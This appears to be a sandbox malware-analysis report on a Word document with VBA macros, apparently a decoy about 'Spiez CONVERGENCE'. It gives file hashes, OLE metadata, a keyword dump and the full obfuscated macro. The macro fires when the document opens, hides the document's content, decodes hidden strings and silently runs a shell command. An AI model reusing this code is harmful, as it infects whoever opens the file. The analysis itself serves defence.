SHA1:	ff59cb2b4a198d1e6438e020bb11602bd7d2510d
SHA256:	e9535d0d5e8e17779b49607988cdb0547efb6abb482dab497a5f0da87cbefc96
SHA512:	2999f20daa470de83abe5cb2fdcf7809b3429570f3c6c14574c6c55096c8f457f87c581cdb8b7527ca38cef9a44c8d8bac4c0bef698581c8ca4fd74b38c492d0
File Content Preview:	........................>.......................p...........r...............k...l...m...n...o...y..............................................................................................................................................................

File Icon

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Spiez CONVERGENCE.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	True
Flash Objects Count:	0
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:
Author:	john
Keywords:
Template:	Normal.dotm
Last Saved By:	john
Revion Number:	4
Total Edit Time:	60
Create Time:	2018-05-14 15:02:00
Last Saved Time:	2018-05-14 15:32:00
Number of Pages:	2
Number of Words:	580
Number of Characters:	3306
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Document Code Page:	1252
Number of Lines:	27
Number of Paragraphs:	7
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 36166

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	36166
Data ASCII:	. . . . . . . . . v . . . . . . . . . . . . . . . } . . . . \\ . . . . . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 01 f0 00 00 00 76 10 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 7d 10 00 00 9d 5c 00 00 00 00 00 00 01 00 00 00 b8 c4 1e 3d 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
"BJD"
"INId"
apoAXZRsdVd
"IxcI"
ETlScgoBRhHyaCajTIq
"UVS"
TPTFQIOU
Object
KHtCdGLsLqZV
"INIPfeqpct}IN"
"D]F"
"OIyINI"
"DOB"
FxfJcsCLC
"K]]"
Len(eKNlehsxPeBLdPKiBpRioVJA)
False
"KPkJJDS"
"IOcINIw"
"\|fd"
"DRT"
Index
tfNaRhVGiNw
"cgB"
"tmetgfgvk"
"NIk"
"MJDTURS"
"USR"
"BJDxDMDc"
"SRDO"
"OBIu"
"dINII"
GDjgDLPOpTOH
"qlIN"
"OBIINI"
"DOIf"
"]BF"
"INIoceINIuIKKOtg"
"qINI"
"INIv"
"STT"
"IINIP"
"vINI"
"INIgINIi"
"JDSX"
"_BBJBBPJD"
"RINIY"
JnhhTKXdDMF
"KMJDT"
"JKKPJDSRDO"
"DTS"
"NIININu"
"INIIKBOrBJJJD"
"DOIvINInINI"
VB_Exposed
"vcngDJ"
"SSSZ"
"SRD"
Integer,
"KKO"
"INIo"
Selection.Font.Color
GCWiglwNCH
"Iigvd"
"OpkeBOB"
"TDO"
dpIPCghTYIO
"_JD"
"DKBBJ"
"JDSR"
czeoPYDHuXBP(tVqwRdTJD)
"NuINI"
sfiSFQuRDPlM(ByVal
"UDBO"
VB_GlobalNameSpace
"K]khJ"
"jmundh"
"NIvO"
"TRUSYW"
"JIv\|"
"NIoINIv\|"
"NIo"
"DPD"
"vkpr"
"SX[ST"
HDNkzlpcpKsMIdDS
"IgINIctINIx"
akGeS,
"NIPI"
"INIZ"
lFqpVWxqJDWI(BbgpP)
ZvPQTIroojCOGl
thaycyR
VB_Customizable
TpBzHbwmzNSwc
"IINIINII"
"PyINIge"
"SUDOIkINIINIIN"
MqDmFnN()
"VDOBIgtINItkpiNINIe"
"TRDOBIOv"
"JJDZSU"
"INIIK}JDRVTWS"
"IKPk"
XDQaMTq
"B_BBBFm"
"JFw"
"YYIKK]Ft_FfNFm_Ftiu]"
"JDDKBOBJFtP"
XDQaMTq,
"GTWX"
"rttjm"
"PJIGIK"
"Dng"
"IcfIN"
"PPINIIN"
"WUD"
"INI"
"JIGIKF"
"vxklzn"
wZPQWBVG
"kpiINIPgvPIN"
"K_RFc_B"
Unit:=wdCharacter,
nlPgcpOuKKuzykGv
"SXZTVUDOIPcINIINIcwINI"
"INIrIKK]khJF"
"SDBO"
"IINIkINIiOINIeIKBOt"
ETlScgoBRhHyaCajTIq(kHrLt
"DBOI\"
"INIIKBB"
"iINIg"
"WUVTRXDOBIPwIN"
"]PJDR"
"gsIN"
"lys"
"\|INIuIKBOcn"
"K]FPD"
"SRDBOBInINIIN"
"RDB"
"VSV"
"hHyaC"
String,
"]Fu}"
"IiOI"
String)
"fyu~"
FKqOztxLLjavwwStRF
"e_FirhPJDRSTDBO"
sTNVQqU
"IhIKNJDVTR"
"JDT"
"uINI"
"SDB"
BbgpP
nmsYxXkvZCrJZXc
"IK_R]F"
"Olk"
"DBOIg"
"IeIN"
"FxSk\\Dfg"
tVqwRdTJD
"cgu"
"OIkINIIKBBJDSRTDOBIINIxtINIdng\YSIKBK"
DAsxVsHQJ
.Count
"KFi"
rVgmmXcuFt
"RSD"
"INI~"
"Fu}F"
"cB_BPJDTURSDBOB"
"rJDRSX"
"YUW"
"{oh"
"JJDTR"
"RSDOhB"
"tzD]F"
"uBJFP"
"IKKB"
"BIg"
"INIw"
"SRDBOI"
"oB_B}vgJD"
"v_F"
"ePD"
"DOBInINIINI"
VB_Creatable
"g\\Dgz"
"nvgdrtq"
"KGTWX"
Chr$(Val("&H"
"KKKB"
"cnP"
"UDOhIvgINIINI"
"tqz{"
"JFu}"
"dnPD"
lmCPcPVINKG
"KKHJ"
"JDRSD"
"TVVT"
czeoPYDHuXBP(eKNlehsxPeBLdPKiBpRioVJA
"kIN"
rMOBquizQidfuY
"IkvIK"
"INII"
vaWnApNUERVVdUevRMo
"TSRDBOIngIN"
"BOI"
VB_Name
"RWSX"
GugteEb)
zLcoKRaYmjuuyzJFwvb
"TWTRDOBI{nINIqecINIgZINIINIjkpINIf"
"XM}ctSRYM}ctXZKN}ct[TKMJDT"
"NI[["
"K]kh"
"RDO"
"VSU"
"B_B"
"SRW"
"KGTWX]F"
"IKBBJDkDMDdtDKKPx"
"[ZSVS"
rrTmWOsw
RMILlFmHZrQOPHCRxu
"tIK]F"
PiVcpWXzBlSx
"DPJDR"
Selection.Delete
"NIn\"
"KKPIi"
"BOp"
"TSR"
"INIIKKB"
"Due"
"BOBIv{INI"
"DTRSDOIv"
"NIxINI"
LEiiNIwNsh
"VYDOIoINISYPRRW"
"PnwPIivhknfIJJDRSTDOBIINIINIIKNIpIMJDU"
UMgTEGMeqcDZFMHaPEaI)
"]ByI"
"j_e"
kvSXzSPBAoLVF
jGBdSOuaTi
"qnngINIgINIPlgev"
"DXU"
Chr(Asc(Mid(eKNlehsxPeBLdPKiBpRioVJA,
"JJD"
"nINIc"
"citINIP"
"JJDV"
"IKNIpI"
"\RV"
"dINI"
"BIWINIINIQINIUINIZQINIwINIQINIv\|"
ICCNmDkzbpo
"YWRS[DO"
"BB}r"
gMaHlNzuvxNfXVIk
"_BBBBF"
"IKBJDR"
"f\\D"
HKfHjGpejTz,
"pvkcnD"
"jmeI"
wqzOrW
"k\|oh{"
"}FkKGTWX]Fu}FNFu}F_F}FNF}F"
"OBDDKBBHJIGIKBFPDhwc"
"F_RPPTWW]RPP"
KrunKQYb
"\|\|p"
ElfIvcAo)
"NIIKBOh"
"INInINIINIpuPigpgINIjugv}vINIPjcI"
"djyB_BB}rg"
"INIU"
"kIK"
"ugzwd"
"KNRK]F"
rrTmWOsw(BbgpP
"JDTYZU"
"_JF"
"SDO"
"INIINIoP"
"IctINIxIKBJD"
"MFKK"
tfNaRhVGiNw(BbgpP)
"INIe\d"
"NII"
"v\|yINI\v\|"
QnTcsgLLYY
VB_Base
"zmgt"
"cINInINI"
dpIPCghTYIO(XDQaMTq,
"OIvOINI"
"tcgINIigIK"
"IuINI"
"jD]"
"INIjmgI"
"INIOrI"
"BJHJDTSRDOB"
"OIvINI"
OpHnpOXn
"VDBO"
"fINIfINIcIK"
"INIfuINI"
"lsq"
"INIdIK"
"IINI"
"cdIKBBJ}{"
"h_BBF"
ActiveDocument.Shapes
"rcuBBOptkgBBOpqg"
"shk{\|ij"
"tXY"
czeoPYDHuXBP
"ire}JJ"
"jtYU"
"Ovgo"
"u}F"
"}ej"
HKfHjGpejTz
"IKBJ"
"NIP"
"IkgfINI"
"BIINInINI"
"BPJD"
"koq{"
"VPPF"
"IugoINIINIkpPIK]B"
"Djg"
"NIINI"
Function
"gIKPkJJDWYR"
glLecopUHJu
"INIINI"
"[TKBO"
"NIINIdI"
"BOBJF"
"ItgINIIKPk"
VB_TemplateDerived
"[yINIUTd[INId[uINIINI"
"SRYPR"
"K]PJJJDS"
Object,
"rqz"
"OIvnINIIKPkJKKPJDTS"
"OBIffINIcI"
"BBPJDR"
nAPnScPISpGFFRcnF
"PetINI{IKKB]BBBF"
gCtsDfR
"SSS"
"DBOI"
"mhxhc"
"rtqD_B"
"FpwNJPJDTS"
YeGkemxylp
ubpLU
"IfIK"
"NIeI"
"PDw"
"N}ec"
"BKPDu"
"TDB"
"BJFPJD"
"[XWS"
Selection.WholeStory
"IRIKBKP"
Mid$(wqzOrW,
czeoPYDHuXBP(sTNVQqU)
.Item(rMOBquizQidfuY).Delete
"JDSRD"
"rgSRRvwgD_R]F"
"kBB_B}"
"vo\|"
"uvoI"
"WRS"
"m}F"
"tZVM"
"}JDRS"
"JJDUVXTZ"
"YdSoINI"
GugteEb
Integer)
HtupShcIikIHJa
String
Len(wqzOrW)
"KPJD"
"NIPR"
"KBFtK"
ElfIvcAo
kHrLt.Run
"BJDSRDBOIVmIN"
"B}{rJ"
"qBBzBJ"
"nINI"
"ThisDocument"
"NFvtg"
"IIN"
CreateObject(czeoPYDHuXBP(rMOBquizQidfuY))
"IKNRK]F"
"TUSUT"
wZPQWBVG()
"Fcx"
"xcINI"
"IuPoINIINI"
"INIOqI"
akGeS
"RDBOIINI"
"OBI"
"NItINIv\|IKKPJDRSDBO"
"ItINIghIKB]BBBBHJDS"
"uIN"
"DBO"
gwxEIxlJXcH
"TWWHJIGIKFl_JF"
hICkWL
"JFx"
"lNF"
qPreGCnvlhVprSEW
"DBOB"
"rlp"
"HJD"
FxfJcsCLC,
"kg\|e\|z"
"MJD"
Integer
"frI"
"zBBQGjGD"
"BOnrBDF\wugtrtqhkng~~c"
"vgUT~eof"
"BBqytB"
"odn{DPJ"
zgwEK
"VY[ZXUDBOIgINIeINIeINIpiINI"
JGavpCVwzOc,
"hIu{INIugINIP"
"DBOII"
"KN}jt[T"
Attribute
bOrzogXniawpXlG
lFqpVWxqJDWI
QjvgpqCfRFUWjU
VB_PredeclaredId
"IZf"
"KHHBuBBBtd"
JGavpCVwzOc
"SRDOI"
"]F_JDRT"
"BBKB]BBBFo\|u"
"TDOB"
"JDUTV"
qbvQHsuOUgPR
sfiSFQuRDPlM
"fINI"
"KPxcnw"
"INIINIQ"
"DTU"
"cgoBR"
"DMDd\"
Omyuwro
"INIBuINIBpvBSRPINIRBJSXTINIuBI"
"K]F"
"{INI"
UMgTEGMeqcDZFMHaPEaI
"ctDBOi"
"BQBBBDuvBBuvk"
"UXT"
"wg\\"
"PJD"
"NITRINIZZ[S"
"NIuvx"
"jBy"
"IKP"
Long)
ETlScgoBRhHyaCajTIq(kvSXzSPBAoLVF,
"UDOIuINIININI"
"VTWUDO"
"iryw"
MqDmFnN
"gvINIu"
"HBF"

VBA Code

Attribute VB_Name = "ThisDocument"

Attribute VB_Base = "1Normal.ThisDocument"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = True

Attribute VB_Customizable = True

Function tfNaRhVGiNw(rMOBquizQidfuY3 As String) As String

    Dim tVqwRdTJD As String

    Dim HtupShcIikIHJa As String

    Dim RMILlFmHZrQOPHCRxu As String

    Dim qPreGCnvlhVprSEW As String

    Dim HDNkzlpcpKsMIdDS As String

    Dim jGBdSOuaTi As String

    Dim ICCNmDkzbpo As String

    Dim bOrzogXniawpXlG As String

    Dim LEiiNIwNsh As String

    Dim YeGkemxylp As String

    Dim nlPgcpOuKKuzykGv As String

    Dim TPTFQIOU As String

    Dim ZvPQTIroojCOGl As String

    Dim lmCPcPVINKG As String

    Dim QjvgpqCfRFUWjU As String

    Dim KHtCdGLsLqZV As String

    Dim apoAXZRsdVd As String

    Dim zgwEK As String

    Dim nAPnScPISpGFFRcnF As String

    qPreGCnvlhVprSEW = "IN" & sfiSFQuRDPlM("49659190") & "IKPk" & "" & "JJD" & "S" & "RDB" & "OI" & "INI" & sfiSFQuRDPlM("85494b4b") & sfiSFQuRDPlM("4b5d42469d") & "cx" & "g" & "B_" & sfiSFQuRDPlM("42469d74") & "]BF" & "ht" & "_JD" & sfiSFQuRDPlM("579f9d529f9d") & sfiSFQuRDPlM("549f9d58") & sfiSFQuRDPlM("9f9d599f") & sfiSFQuRDPlM("9d5a9f9d") & "UVS" & "DBOI\" & "INIINIQ" & sfiSFQuRDPlM("518f9b958790494e4985858795") & "PPINIIN" & "IINIP" & sfiSFQuRDPlM("91494e4994494e4989") & sfiSFQuRDPlM("5183494b5d42469d9585828a728263966a9f5f") & "Fcx"

    ZvPQTIroojCOGl = sfiSFQuRDPlM("655c7e79") & "fyu~" & "vgUT~eof" & sfiSFQuRDPlM("50677a8742") & "BQBBBDuvBBuvk" & "_BBBBF" & "djyB_BB}rg" & "JDTYZU" & "RWSX" & "VDOBIgtINItkpiNINIe" & "qnngINIgINIPlgev" & "INIPfeqpct}IN" & "IugoINIINIkpPIK]B" & sfiSFQuRDPlM("4242504a449d529f9d539f9d54")

    HtupShcIikIHJa = "IN" & sfiSFQuRDPlM("4983494e4996") & sfiSFQuRDPlM("8b8e9549") & "KKPIi" & sfiSFQuRDPlM("6796688b8782") & sfiSFQuRDPlM("8e66494a") & sfiSFQuRDPlM("4a449d53") & sfiSFQuRDPlM("9f9d529f") & "VT" & "WUD" & sfiSFQuRDPlM("424f884983494e") & "IIN" & sfiSFQuRDPlM("49859b75494e4995") & "INI" & sfiSFQuRDPlM("878669949197927291") & "INI" & "IKNIpI" & sfiSFQuRDPlM("4d4a449d559f9d549f9d539f9d52") & "DBOII" & "NIININu" & "INIrIKK]khJF" & "KFi" & "e_FirhPJDRSTDBO"

    apoAXZRsdVd = "BJD" & "SR" & sfiSFQuRDPlM("9d549f444f") & "Ic" & "nINIc" & "INI" & "\RV" & "IKBJ" & "BB}r" & sfiSFQuRDPlM("7f4a449d56") & sfiSFQuRDPlM("9f9d559f9d52") & sfiSFQuRDPlM("9f9d539f9d579f") & "TDOB" & sfiSFQuRDPlM("4950958774") & sfiSFQuRDPlM("986b656792494e4991") & sfiSFQuRDPlM("494e4963") & "citINIP" & "gvINIu" & "uvoI" & "NIk" & sfiSFQuRDPlM("966f494b4b42425d42424670988353") & "kBB_B}" & "rJDRSX" & "VTWUDO" & "hIu{INIugINIP" & sfiSFQuRDPlM("7967494e499787757649")

    ICCNmDkzbpo = "JJD" & "SRDOI" & "INIIKKB" & "O" & "BJFPJD" & sfiSFQuRDPlM("529f9d539f9d549f") & "DOIvINInINI" & "IKPk" & "JKKPJDSRDO" & sfiSFQuRDPlM("88424995494e4965919096838b90494b506b9098918d") & "JDDKBOBJFtP" & "JDRSD" & "OIvnINIIKPkJKKPJDTS" & "RDBOIINI"

    nAPnScPISpGFFRcnF = "NIP" & sfiSFQuRDPlM("87494e4964") & "gsIN" & sfiSFQuRDPlM("498f494b5d") & "BPJD" & sfiSFQuRDPlM("9d549f9d52") & "S" & "DBOIg" & "INIo" & "INIv" & sfiSFQuRDPlM("4f8b76494b42") & "BJDxDMDc" & sfiSFQuRDPlM("94444d446b83") & "DMDd\" & "DKBBJ" & "B}{rJ" & "DXU" & sfiSFQuRDPlM("9d569f9d579f9d529f9d54") & "S" & sfiSFQuRDPlM("444f684990766b838e8563") & sfiSFQuRDPlM("494e496a67494e4985") & "INIINIoP" & "INIv" & "PetINI{IKKB]BBBF" & "oB_B}vgJD" & sfiSFQuRDPlM("9d549f9d52")

    LEiiNIwNsh = "DO" & "IuINI" & sfiSFQuRDPlM("6776494e49") & "Ovgo" & "IKBJDR" & "TS" & "DBOB" & "IxcI" & "NIn\" & "YdSoINI" & "cdIKBBJ}{" & sfiSFQuRDPlM("72877f4a") & "DTU" & "SRDBOI" & "qINI" & "INIINI" & "kIK" & "BBKB]BBBFo|u" & sfiSFQuRDPlM("5f7d967b72677f4a44") & "RSDOhB" & "ItINIghIKB]BBBBHJDS" & "TRDOBIOv" & sfiSFQuRDPlM("676f494e497567494e4976494b")

    QjvgpqCfRFUWjU = sfiSFQuRDPlM("529f9d53") & sfiSFQuRDPlM("549f9d58") & "SR" & "[" & sfiSFQuRDPlM("9d5a9f9d57") & sfiSFQuRDPlM("9f9d569f") & "TU" & "SY" & "SSS" & "VSU" & sfiSFQuRDPlM("44424f884249") & "jmeI" & "NIxINI" & "e" & "INI" & sfiSFQuRDPlM("87494e49919995") & sfiSFQuRDPlM("767c494e") & "I" & "v|yINI\v|" & sfiSFQuRDPlM("494e4987949549") & "NIoINIv|" & sfiSFQuRDPlM("494e499275918896998394494e498b9190494e497749") & "NItINIv|IKKPJDRSDBO" & "ItgINIIKPk"

    bOrzogXniawpXlG = sfiSFQuRDPlM("82879282") & "cj" & sfiSFQuRDPlM("4d4a4a4a") & "DU" & sfiSFQuRDPlM("9d529f9d") & "ST" & sfiSFQuRDPlM("9f44424f88") & sfiSFQuRDPlM("49658e494e49") & "" & "INI" & sfiSFQuRDPlM("508a9683494e") & "IkvIK" & sfiSFQuRDPlM("4b4f9487928e") & sfiSFQuRDPlM("63656742424a7d") & "jtYU" & sfiSFQuRDPlM("4d7d856a") & "tZVM" & "}j" & "tXY" & "KN}jt[T" & "K]PJJJDS" & "YUW" & "X" & sfiSFQuRDPlM("9d549f9d5b9f9d5a9f9d529f9d569f44424f884249") & "INIe\d" & "[yINIUTd[INId[uINIINI"

    HDNkzlpcpKsMIdDS = sfiSFQuRDPlM("44424f67") & "" & sfiSFQuRDPlM("6385968b") & sfiSFQuRDPlM("9190424a") & "DS" & sfiSFQuRDPlM("569f9d52") & "U" & "TDO" & "IeIN" & "Iu" & "INI" & "" & sfiSFQuRDPlM("494e4991") & "INIIKBB" & sfiSFQuRDPlM("504a449d52") & sfiSFQuRDPlM("9f9d539f9d549f9d559f44") & "OIyINI" & "INIOqI" & "NIIKBOh" & "uBJFP" & sfiSFQuRDPlM("446f71826687447d527f42") & "OBDDKBBHJIGIKBFPDhwc" & sfiSFQuRDPlM("826f87449f5d42869142")

    nlPgcpOuKKuzykGv = "Ft" & "B_B" & "HJD" & "SR" & "TD" & "OBI" & sfiSFQuRDPlM("748390494e") & "IiOI" & "NII" & sfiSFQuRDPlM("4b42469d") & sfiSFQuRDPlM("72826376") & "jBy" & sfiSFQuRDPlM("8e87424a4a504a44") & sfiSFQuRDPlM("9d529f9d54") & "SDB" & "OIvINI" & "INIOrI" & "KBFtK" & "BOBJF" & "PJ" & sfiSFQuRDPlM("449d539f9d529f9d549f444f8849919987494e4976916e494e4994494b506b9098918d874a4b4b504a449d539f9d529f9d549f444f8842498b90494e496591909683494e4995494b") & "Pk"

    RMILlFmHZrQOPHCRxu = sfiSFQuRDPlM("98918d87") & "JIv|" & "INI~" & "IKKB" & sfiSFQuRDPlM("424f78838e") & sfiSFQuRDPlM("978742469d") & sfiSFQuRDPlM("9565828a") & "cv" & "BOp" & "BJD" & sfiSFQuRDPlM("9d539f9d55") & sfiSFQuRDPlM("9f9d529f") & "T" & "VDBO" & "BI" & "w" & sfiSFQuRDPlM("8396494e4975") & sfiSFQuRDPlM("8b8e9949") & "NIeI" & "NIINI" & "tIK]F" & "t" & sfiSFQuRDPlM("7482638582") & "vkpr" & sfiSFQuRDPlM("6768826794679085679f425f42") & "JDUTV" & sfiSFQuRDPlM("529f9d539f44424f88499097494e4987494e49968e9b6591494e49758b8e") & sfiSFQuRDPlM("8790494e4990968b49")

    jGBdSOuaTi = "IIN" & sfiSFQuRDPlM("498b908949") & sfiSFQuRDPlM("4b7f7d4a44") & "UT" & "RSD" & "BOI" & "uI" & "NI" & "dINII" & sfiSFQuRDPlM("4e496790494b4d") & "JDSR" & sfiSFQuRDPlM("9d549f444f") & "BI" & "INI" & "nINI" & "IK_R]F" & "}JDRS" & sfiSFQuRDPlM("9f44424f884249758549") & sfiSFQuRDPlM("4e49948b929664494b") & "MJDTURS" & "DOBInINIINI" & "INIIK}JDRVTWS"

    lmCPcPVINKG = sfiSFQuRDPlM("9f9d569f9d539f9d579f9d") & "UDOhIvgINIINI" & "uINI" & "kpiINIPgvPIN" & sfiSFQuRDPlM("497186494b425d7d9596948b90897d7f7f42469d7282") & "cB_BPJDTURSDBOB" & "IINIkINIiOINIeIKBOt" & "BOnrBDF\wugtrtqhkng~~c" & sfiSFQuRDPlM("9292668396837e7e6e9185838e7e7e6f8b85949195918896")

    KHtCdGLsLqZV = sfiSFQuRDPlM("9f9d589f9d59") & "UDBO" & "BIg" & sfiSFQuRDPlM("83494e4991") & sfiSFQuRDPlM("494e4987") & "uINI" & "INI" & "INId" & "kIN" & "IINI" & sfiSFQuRDPlM("8b91906e918949") & "K_RFc_B" & "BJHJDTSRDOB" & "IgINIctINIx" & "IKBBJDkDMDdtDKKPx" & sfiSFQuRDPlM("675c5c4a449d53") & sfiSFQuRDPlM("9f9d529f") & sfiSFQuRDPlM("444f88498799494e4990494b506b9098918d874a4b5d469d7882638e9f504a449d539f9d52")

    TPTFQIOU = sfiSFQuRDPlM("9b494e49") & "I" & sfiSFQuRDPlM("4e499588") & "INII" & "NIPI" & "KKO" & sfiSFQuRDPlM("7487726e") & "cgB" & sfiSFQuRDPlM("424988645b49") & "N}ec" & "[TKBO" & "B" & sfiSFQuRDPlM("4f95928e8b96") & sfiSFQuRDPlM("424f8842469d688277") & "BF" & sfiSFQuRDPlM("8a728382768a9f") & "BBPJDR" & sfiSFQuRDPlM("9d549f9d539f4442") & "OBI" & sfiSFQuRDPlM("7197964f494e49978e8e494e4970494b") & "]PJDR" & sfiSFQuRDPlM("9d539f9d549f9d559f44424f8842") & sfiSFQuRDPlM("497587494e49964f494e496b96878f72949192") & "INIIKBOrBJJJD"

    zgwEK = sfiSFQuRDPlM("884249696776") & "xcINI" & "INIw" & "IKPk" & "J" & sfiSFQuRDPlM("469d9077828e6e") & "K]khJ" & sfiSFQuRDPlM("469d698272859f") & sfiSFQuRDPlM("7d4a449d529f9d") & "SDBO" & "Iu" & "INIdIK" & "MJD" & "TR" & sfiSFQuRDPlM("539f9d559f44") & "OBIINI" & sfiSFQuRDPlM("90494e498e91") & sfiSFQuRDPlM("858d6e91494e") & sfiSFQuRDPlM("4989494b7f4b9d469d698292859f7d4a449d549f9d529f9d539f44424f") & sfiSFQuRDPlM("884249948b9296494e4964494e497585494b4d4a449d549f9d539f9d529f9d559f44424f8842498d6e91") & sfiSFQuRDPlM("8989494e4985494e")

    YeGkemxylp = "K]kh" & sfiSFQuRDPlM("4a469d92") & sfiSFQuRDPlM("75786794") & sfiSFQuRDPlM("75828b71") & "vc" & "dnPD" & "xg" & "tk" & "DPD" & "ctDBOi" & sfiSFQuRDPlM("8742554b9d46") & "i" & "h_BBF" & sfiSFQuRDPlM("6f7c95504463") & sfiSFQuRDPlM("9575678f84828e9b4450") & "JDT" & "SRD" & "BOBIv{INI" & sfiSFQuRDPlM("494e49696749") & "KPkJJDS" & "WUVTRXDOBIPwIN" & "IuPoINIINI" & sfiSFQuRDPlM("8790494e4996506397")



    rMOBquizQidfuY3 = "yj" & sfiSFQuRDPlM("7a66738b9b83") & "pg" & "xn" & "vo|" & "vxklzn" & ""

    tVqwRdTJD = "mhxhc" & "k|oh{" & "|fd" & "ugzwd"

    rMOBquizQidfuY3 = "y|" & sfiSFQuRDPlM("877383717589766c77")

    tVqwRdTJD = ZvPQTIroojCOGl & LEiiNIwNsh & apoAXZRsdVd & nAPnScPISpGFFRcnF & lmCPcPVINKG & HDNkzlpcpKsMIdDS & nlPgcpOuKKuzykGv & ICCNmDkzbpo & qPreGCnvlhVprSEW & bOrzogXniawpXlG & TPTFQIOU & QjvgpqCfRFUWjU & RMILlFmHZrQOPHCRxu & YeGkemxylp & HtupShcIikIHJa & zgwEK & jGBdSOuaTi & KHtCdGLsLqZV

    tVqwRdTJD = czeoPYDHuXBP(tVqwRdTJD)

    tfNaRhVGiNw = tVqwRdTJD

End Function



Function rrTmWOsw(BbgpP As String)

    Dim grMOBquizQidfuY2 As Integer

    Dim gMaHlNzuvxNfXVIk As Integer

    grMOBquizQidfuY2 = 5378

    gMaHlNzuvxNfXVIk = 4

    If grMOBquizQidfuY2 < gMaHlNzuvxNfXVIk Then

        BbgpP = BbgpP & "" & "zv" & "rlp" & "rttjm" & sfiSFQuRDPlM("6e88788b7b716668877766") & sfiSFQuRDPlM("77757877")

        rrTmWOsw = tfNaRhVGiNw(BbgpP) & lFqpVWxqJDWI(BbgpP)

    Else

        BbgpP = "lsq" & "iryw" & "zs" & "jmundh" & "zn" & "{oh"

        rrTmWOsw = tfNaRhVGiNw(BbgpP) & lFqpVWxqJDWI(BbgpP)

    End If

End Function



Function sfiSFQuRDPlM(ByVal wqzOrW As String) As String

    Dim akGeS As Long

    For akGeS = 1 To Len(wqzOrW) Step 2

    sfiSFQuRDPlM = sfiSFQuRDPlM & Chr$(Val("&H" & Mid$(wqzOrW, akGeS, 2)))

    Next akGeS

End Function



Function MqDmFnN()

    With ActiveDocument.Shapes

        For rMOBquizQidfuY = .Count To 1 Step -1

            .Item(rMOBquizQidfuY).Delete

        Next

    End With

End Function



Function wZPQWBVG()

    Selection.WholeStory

    Selection.Font.Color = -587137025

    ThisDocument.Range(0, 0).Select

End Function



Function ETlScgoBRhHyaCajTIq(kHrLt As Object, ETlScgoBRhHyaCajTIq2 As String, XDQaMTq As Integer) As String

    Dim HKfHjGpejTz As String

    Dim UMgTEGMeqcDZFMHaPEaI As String

    HKfHjGpejTz = ETlScgoBRhHyaCajTIq2

    UMgTEGMeqcDZFMHaPEaI = HKfHjGpejTz

    Dim grMOBquizQidfuY6 As Integer

    Dim gCtsDfR As Integer

    grMOBquizQidfuY6 = 3

    gCtsDfR = grMOBquizQidfuY6 * 4

    If grMOBquizQidfuY6 < gCtsDfR Then

        XDQaMTq = dpIPCghTYIO(XDQaMTq, UMgTEGMeqcDZFMHaPEaI)

        kHrLt.Run HKfHjGpejTz, XDQaMTq, True

    End If

    HKfHjGpejTz = sfiSFQuRDPlM("45546c53") & "cgoBR" & "hHyaC" & "ajTIq6"

    ETlScgoBRhHyaCajTIq = HKfHjGpejTz

End Function



Function dpIPCghTYIO(rMOBquizQidfuY7 As Integer, TpBzHbwmzNSwc As String)

    Dim Omyuwro As Integer

    Omyuwro = rMOBquizQidfuY7 * 2

    TpBzHbwmzNSwc = "" & "l|" & "shk{|ij"

    Dim grMOBquizQidfuY8 As Integer

    Dim glLecopUHJu As Integer

    grMOBquizQidfuY8 = 2833

    glLecopUHJu = 6

    If grMOBquizQidfuY8 > glLecopUHJu Then

        TpBzHbwmzNSwc = "zmgt" & "fh" & "lys" & "koq{" + TpBzHbwmzNSwc

        Omyuwro = rMOBquizQidfuY7 - rMOBquizQidfuY7

    End If

    dpIPCghTYIO = Omyuwro

End Function



Sub MultiPage1_Layout(ByVal Index As Long)

    Dim rMOBquizQidfuY As String

    Dim kvSXzSPBAoLVF As Object

    Dim ElfIvcAo As Integer

    Dim JGavpCVwzOc As String

    MultiPage1.Select

    Selection.Delete Unit:=wdCharacter, Count:=1

    wZPQWBVG

    MqDmFnN

    ElfIvcAo = 1635

    rMOBquizQidfuY = "yP" & "u"

    Set kvSXzSPBAoLVF = CreateObject(czeoPYDHuXBP(rMOBquizQidfuY))

    JGavpCVwzOc = rrTmWOsw("data1")

    JGavpCVwzOc = ETlScgoBRhHyaCajTIq(kvSXzSPBAoLVF, JGavpCVwzOc, ElfIvcAo)

End Sub



Function czeoPYDHuXBP(eKNlehsxPeBLdPKiBpRioVJA As String) As String

    Dim FxfJcsCLC As Long

    Dim PiVcpWXzBlSx As String

    Dim GugteEb As Integer

    GugteEb = 34

    For FxfJcsCLC = 1 To Len(eKNlehsxPeBLdPKiBpRioVJA)

        PiVcpWXzBlSx = PiVcpWXzBlSx & Chr(Asc(Mid(eKNlehsxPeBLdPKiBpRioVJA, FxfJcsCLC, 1)) - GugteEb)

    Next FxfJcsCLC

    czeoPYDHuXBP = PiVcpWXzBlSx

End Function



Function lFqpVWxqJDWI(rMOBquizQidfuY4 As String) As String

    Dim sTNVQqU As String

    Dim zLcoKRaYmjuuyzJFwvb As String

    Dim KrunKQYb As String

    Dim nmsYxXkvZCrJZXc As String

    Dim thaycyR As String

